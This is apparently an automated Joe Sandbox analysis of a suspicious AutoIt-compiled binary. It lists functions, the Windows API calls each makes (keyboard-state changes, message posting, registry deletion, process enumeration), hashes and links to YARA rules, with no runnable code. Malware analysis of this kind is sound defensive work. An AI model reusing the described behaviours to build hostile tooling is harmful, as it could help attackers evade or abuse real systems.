                                                                                  • Opcode ID: 8a7c81be04624b4599176f1d7d68866bb1d0912885879ec2ec9471d2a1caf585
                                                                                  • Instruction ID: 0366f47565c86b94fa8a11d0063ee2cf91e03cbed1c0e9e23697dcbb2334d452
                                                                                  • Opcode Fuzzy Hash: 8a7c81be04624b4599176f1d7d68866bb1d0912885879ec2ec9471d2a1caf585
                                                                                  • Instruction Fuzzy Hash: 6D71AD74A00619DFCF04EFA4C8959AEBBF5FF49310F10845AE84AAB391DB34AD44CB94
                                                                                  Function 00533DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 00533DE7
                                                                                  • GetKeyboardState.USER32(?), ref: 00533DFC
                                                                                  • SetKeyboardState.USER32(?), ref: 00533E5D
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00533E8B
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00533EAA
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00533EF0
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00533F13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 4db584aab7cf07054512a1321d440fe4495ea5a295cc37ccf088c6c11685beae
                                                                                  • Instruction ID: 15d6b7a7e916f875d6c8483a4f1dbeba02de13b23fd4ee8d006754f034826757
                                                                                  • Opcode Fuzzy Hash: 4db584aab7cf07054512a1321d440fe4495ea5a295cc37ccf088c6c11685beae
                                                                                  • Instruction Fuzzy Hash: 9951B4A0A047D53DFB3647248C46BB67FA97F06304F084589F0D5468C2D3A9EEC8E760
                                                                                  Function 00533BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 00533C02
                                                                                  • GetKeyboardState.USER32(?), ref: 00533C17
                                                                                  • SetKeyboardState.USER32(?), ref: 00533C78
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00533CA4
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00533CC1
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00533D05
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00533D26
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 155495f8d34e7a574f7457afb358d02e6fbf1ff4cc34549cdca4f6afee264bb0
                                                                                  • Instruction ID: df3bee2190878447ccf155524105c2bd4556473f04f0a6ae80d16f24e7790535
                                                                                  • Opcode Fuzzy Hash: 155495f8d34e7a574f7457afb358d02e6fbf1ff4cc34549cdca4f6afee264bb0
                                                                                  • Instruction Fuzzy Hash: 6351E6A05087D53DFB3287348C56B76BFA97F06340F088889E0D55A8C2D795EED8E760
                                                                                  Function 00537DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 2945705084-0
                                                                                  • Opcode ID: 277d7cabece15c1061e30902b1477321a1c4a42e9bfca3881114e87971a10bee
                                                                                  • Instruction ID: 1c39d306a3f362eb8a60feae99713ceaf6daa9c5af03ba74b52f414abfc8d4b4
                                                                                  • Opcode Fuzzy Hash: 277d7cabece15c1061e30902b1477321a1c4a42e9bfca3881114e87971a10bee
                                                                                  • Instruction Fuzzy Hash: 7D41A46AC10219B6DB20EBF4C84A9CFBBACBF48310F104966E518F3161F674D691C7E5
                                                                                  Function 0055CCF7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 0055CD76
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 0-1519213456
                                                                                  • Opcode ID: 50683d812ff7c18cf0c9b686b4147c63f2fd448aca933b4754b845e84e2c954f
                                                                                  • Instruction ID: 409dcb76aa8b0d27116ec2a5f414d8441266c40272c2e3ff3deb57a1295c43ba
                                                                                  • Opcode Fuzzy Hash: 50683d812ff7c18cf0c9b686b4147c63f2fd448aca933b4754b845e84e2c954f
                                                                                  • Instruction Fuzzy Hash: EC41D439900344AFC710DF68CC69FA9BF79FB09311F140226ED19E72D1C670AD49EA90
                                                                                  Function 00553D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00553DA1
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00553DCB
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00553E80
                                                                                    • Part of subcall function 00553D72: RegCloseKey.ADVAPI32(?), ref: 00553DE8
                                                                                    • Part of subcall function 00553D72: FreeLibrary.KERNEL32(?), ref: 00553E3A
                                                                                    • Part of subcall function 00553D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00553E5D
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00553E25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 395352322-0
                                                                                  • Opcode ID: 3395ba8d61248e975c92d2889d5aaffdfefb313d4aec16c12a07700699646275
                                                                                  • Instruction ID: 14fb9c3bc9724b64436ddba722f9e23015dac87330d924625c2df959d5a6299a
                                                                                  • Opcode Fuzzy Hash: 3395ba8d61248e975c92d2889d5aaffdfefb313d4aec16c12a07700699646275
                                                                                  • Instruction Fuzzy Hash: BF310E71911109BFDB159B90DC99AFFBBBCFF18341F00016AE916A2150E6709F899B60
                                                                                  Function 00558FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00558FE7
                                                                                  • GetWindowLongW.USER32(015CEB50,000000F0), ref: 0055901A
                                                                                  • GetWindowLongW.USER32(015CEB50,000000F0), ref: 0055904F
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00559081
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005590AB
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 005590BC
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005590D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  • Opcode ID: 43a15a27b4515089ec3dcbcdb9aa95b8fa2a5d351bfd856fba41f6da908aafb1
                                                                                  • Instruction ID: cc0d415c0d9abd1fbb2a9ca0729cb9febdb278d9101c583a0229dd975ab9a8cd
                                                                                  • Opcode Fuzzy Hash: 43a15a27b4515089ec3dcbcdb9aa95b8fa2a5d351bfd856fba41f6da908aafb1
                                                                                  • Instruction Fuzzy Hash: 2A315534200215EFDB608F58DCA8F643BB5FB5A325F140266F9098F2F1CB75A848EB50
                                                                                  Function 005308AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005308F2
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00530918
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0053091B
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530939
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00530942
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00530967
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530975
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 2f2e3cdfdbd6500de1428176aca9845cc324516365b90795bb71850ea86dab23
                                                                                  • Instruction ID: 726b6b2c58caedb546825ace1d690aac18934cc671ef2fae2b69fd4d16757e41
                                                                                  • Opcode Fuzzy Hash: 2f2e3cdfdbd6500de1428176aca9845cc324516365b90795bb71850ea86dab23
                                                                                  • Instruction Fuzzy Hash: 80218176601319AFAF109FA8DC88EBB77BCFF09760B008525F919DB191D670EC459B60
                                                                                  Function 00532472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                  • API String ID: 1038674560-2734436370
                                                                                  • Opcode ID: 315437fc32aa327c50577c279aa9cb3ab3b75e7b2ff6ad5d2e167d51c361e866
                                                                                  • Instruction ID: c765384b542a5ede919a400ad7294017aa9417847bbafbf94f0f3b0082dbdfe8
                                                                                  • Opcode Fuzzy Hash: 315437fc32aa327c50577c279aa9cb3ab3b75e7b2ff6ad5d2e167d51c361e866
                                                                                  • Instruction Fuzzy Hash: 22213A32104A1277DA20B6249C16EBB7F98FFA5310F504429F9459B081E7659A82C3A5
                                                                                  Function 00530986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005309CB
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005309F1
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 005309F4
                                                                                  • SysAllocString.OLEAUT32 ref: 00530A15
                                                                                  • SysFreeString.OLEAUT32 ref: 00530A1E
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00530A38
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530A46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 19717903526ac1f606203df73054a7f76c2b55cdb03fb4e44abfa71f2503d895
                                                                                  • Instruction ID: 01f22594a6cb8ca77179ca597e323c94222cad329756c872daa26e23c0b582cb
                                                                                  • Opcode Fuzzy Hash: 19717903526ac1f606203df73054a7f76c2b55cdb03fb4e44abfa71f2503d895
                                                                                  • Instruction Fuzzy Hash: 4E217475200304AFDB109FA8EC89DAA7BFCFF48360B408125F909CB2A1D670EC859764
                                                                                  Function 0055A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                    • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                    • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0055A32D
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0055A33A
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0055A345
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0055A354
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0055A360
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
                                                                                  • Opcode ID: 677a2ced1c22265b0f178a7ba719c47f5655716c61bd42b2ec174ce00567b7e1
                                                                                  • Instruction ID: 06bb58d83c8f0a288c85bda88d0533f0e24ac873b76995b7210a7964bbf49d1a
                                                                                  • Opcode Fuzzy Hash: 677a2ced1c22265b0f178a7ba719c47f5655716c61bd42b2ec174ce00567b7e1
                                                                                  • Instruction Fuzzy Hash: 791190B1150219BEEF155FA4CC86EEB7F6DFF09798F014215FA08A60A0C6729C25DBA4
                                                                                  Function 0050CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 0050CCF6
                                                                                  • GetWindowRect.USER32(?,?), ref: 0050CD37
                                                                                  • ScreenToClient.USER32(?,?), ref: 0050CD5F
                                                                                  • GetClientRect.USER32(?,?), ref: 0050CE8C
                                                                                  • GetWindowRect.USER32(?,?), ref: 0050CEA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                  • String ID:
                                                                                  • API String ID: 1296646539-0
                                                                                  • Opcode ID: 1ce1d9f838dcb2833989dcd5cf2c5065d553c12b23e0154689443697ebdb493d
                                                                                  • Instruction ID: d444894666a25a119376e326068c28d82110913a5c660046b548efe91a0db35c
                                                                                  • Opcode Fuzzy Hash: 1ce1d9f838dcb2833989dcd5cf2c5065d553c12b23e0154689443697ebdb493d
                                                                                  • Instruction Fuzzy Hash: FBB1487990024ADBDF10CFA8C5847EEBFB5FF09310F149629EC59AB290DB30A950DB64
                                                                                  Function 00551BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00551C18
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00551C26
                                                                                  • __wsplitpath.LIBCMT ref: 00551C54
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscat.LIBCMT ref: 00551C69
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00551CDF
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00551CF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 1380811348-0
                                                                                  • Opcode ID: a11ef89bb20edce4a1fb3a1ecef0f981493186bd293a34abb0da56058a9ce807
                                                                                  • Instruction ID: 757683b40c32be11a76c70915da3b89a841a05407e9d5a1bbbde3dc4ac70fad4
                                                                                  • Opcode Fuzzy Hash: a11ef89bb20edce4a1fb3a1ecef0f981493186bd293a34abb0da56058a9ce807
                                                                                  • Instruction Fuzzy Hash: 78518F711043059FD720EF24D885EAFBBE8FF88754F00491EF98A97291DB74A908CB96
                                                                                  Function 00552FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005530AF
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005530EF
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00553112
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0055313B
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0055317E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0055318B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                  • String ID:
                                                                                  • API String ID: 3451389628-0
                                                                                  • Opcode ID: dc1f03f26939030008ba9f7039d486547b4002cc4c7dd49c9c429c0c0257ac7c
                                                                                  • Instruction ID: e52643c3ba2bf4a0aaba325ba6e6e4fc21df5e4882f098fbfde31c0cfc15c7cc
                                                                                  • Opcode Fuzzy Hash: dc1f03f26939030008ba9f7039d486547b4002cc4c7dd49c9c429c0c0257ac7c
                                                                                  • Instruction Fuzzy Hash: 08515831108304AFC704EF64C895E6ABBF9FF88344F04491EFA59972A1DB35EA09DB52
                                                                                  Function 005584DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00558540
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00558577
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0055859F
                                                                                  • GetMenuItemID.USER32(?,?), ref: 0055860E
                                                                                  • GetSubMenu.USER32(?,?), ref: 0055861C
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0055866D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
